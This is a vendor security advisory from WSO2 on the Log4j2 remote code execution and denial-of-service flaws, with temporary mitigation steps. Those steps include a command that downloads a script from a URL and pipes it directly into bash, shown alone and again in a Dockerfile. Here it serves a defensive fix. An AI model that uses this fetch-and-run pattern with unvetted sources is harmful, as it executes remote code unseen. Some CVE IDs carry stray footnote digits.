Log4j2 zero-day vulnerability (CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105)

Version: 4.0

Published: December 13, 2021

Last Updated: 26 January, 2022

WSO2 impacted: Yes

Evidence of compromise: No

Customers actions required: Yes


Reported Incident

WSO2 Security and Compliance team received notifications that there is zero-day exploitation on December 10, 2021, with regard to a component that is being used in multiple WSO2 products and services. Upon notification Security and Compliance team along with the Engineering teams and infrastructure, teams performed a detailed analysis of the WSO2 environment as well as the products which were impacted and mitigation steps were identified. WSO2 Engineering teams tested and confirmed the mitigation steps against the affected products and ensured that all product functionalities are functioning as intended.

Impact on WSO2 Products and Deployments

This announcement is applicable only for the following product versions:

  • WSO2 Identity Server 5.9.0 and above
  • WSO2 Identity Server Analytics 5.7.0 and above
  • WSO2 Identity Server as Key Manager 5.9.0 and above
  • WSO2 API Manager 3.0.0 and above
  • WSO2 API Manager Analytics 2.6.0 and above
  • WSO2 Enterprise Integrator 6.1.0 and above
  • WSO2 Enterprise Integrator Analytics 6.6.0 and above 
  • WSO2 Micro Integrator 1.1.0 and above 
  • WSO2 Micro Integrator Dashboard 4.0.0 and above 
  • WSO2 Micro Integrator Monitoring Dashboard 1.1.0 and above 
  • WSO2 Stream Processor 4.0.0 and above 
  • WSO2 Stream Integrator 1.0.0 and above 
  • WSO2 Stream Integrator Tooling 1.0.0 and above 
  • WSO2 Open Banking AM 2.0.0 and above
  • WSO2 Open Banking KM 2.0.0 and above
  • WSO2 Open Banking BI 1.3.0 and above
  • WSO2 Micro Gateway 3.2.0 and above

If you are using a product not listed above, or older versions than listed, as of our current analysis, your deployment is not affected by the vulnerability discussed in CVE-2021-442281, CVE-2021-450463, and CVE-2021-451054. Therefore, in such deployments, no further remediation actions are required.

Support Customers

If you are a WSO2 support customer, please follow the security announcements WSO2 made on 2021 December 11, 12, 13, 15, 16, and 19 through the WSO2 support portal immediately. If you need any further information or assistance, please reach the WSO2 support team. 

If you are not a WSO2 customer who is affected by this security incident, please reach us through the Contact Us form for further assistance.

As per the CVE-2021-442281 and the associated Apache Log4j2 security advisory listed in 2, Apache Log4j2 <=2.15.0 versions are vulnerable to a remote code execution vulnerability. The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-44228

Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

As per the CVE-2021-450463 and the associated Apache Log4j2 security advisory listed in 2, Apache Log4j2 <=2.16.0 versions are vulnerable to a remote code execution vulnerability. The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-45046

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.

As per the CVE-2021-45105[4] and the associated Apache Log4j2 security advisory listed in [2], Apache Log4j2 <=2.17.0 versions are vulnerable to a Denial of Service vulnerability. The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-45105

Apache Log4j2 versions 2.0-alpha1 through 2.16.0, excluding 2.12.3, did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

WSO2 Engineering teams have already updated the Log4j 2 version to 2.17.0 and currently working on updating the Log4j 2 version to 2.17.1. WSO2 values both its customers as well as community users. Since this vulnerability is being widely exploited, we urge our community users also to follow the mitigation steps to safeguard their deployments.

It is recommended to apply the below-mentioned temporary mitigation at the earliest possible. Please note that the temporary mitigation script shared below is specific to Linux environments as of now.

Temporary mitigation steps on CVE-2021-442281 and CVE-2021-450463

  1. Ensure that you have zip and unzip commands installed on the server hosting the product. 
  2. You can follow any of the following options

    Option 1: Navigate to the product-home folder and run the following command:

        curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh | bash
    
    Option 2:
    1. Download the script from https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh
    2. Copy the script into the product-home
    3. Run the script from product-home, using the following command: bash CVE-2021-44228-mitigation.sh
  3. After executing the above script, restart the product.

The temporary mitigation script will remove org/apache/logging/log4j/core/lookup/JndiLookup.class from all affected Log4j2 dependencies found within the folder (and associated sub-folders) this script is executed. This approach is also recommended on the Log4j2 security page2. After applying the temporary fix, please ignore the ClassNotFoundException exception for the JndiLookup class which could occur during the product startup. 

If you are using Docker images in your deployment, it's advised to temporarily create a new Docker image, running the provided script as an additional build step of the image. 

Example Docker images for Ubuntu-based distributions:

Ubuntu based Dockerfile example

FROM wso2/wso2is:5.10.0
 
USER root
 
RUN \
    apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        zip \
    && rm -rf /var/lib/apt/lists/*
 
USER wso2carbon
 
RUN curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh | bash

Identifying and applying temporary mitigations on CVE-2021-451054

Please note that WSO2 has analyzed the CVE-2021-45105 and the associated update of Log4j (2.17.0). The default configurations of WSO2 products are not vulnerable for CVE-2021-45105. We strongly recommend executing the below command from the WSO2 product-home, and confirming that the customized configurations that you use are not vulnerable.

grep -R '${ctx:' . | grep 'log4j'
Get-ChildItem -recurse | Select-String -ErrorAction SilentlyContinue -pattern '\${ctx:' | group path | select name | Select-String 'log4j'

If no results were returned by the above command, your deployment is not affected. However, if any matches were identified, please remove references to Context Lookups from the identified configuration file as per the recommendations illustrated in the CVE-2021-45105 section of Log4j security advisory 2.

If you are interested in CVE-2021-4104 please have a look at 5.

We will update this announcement if further actions are required.

References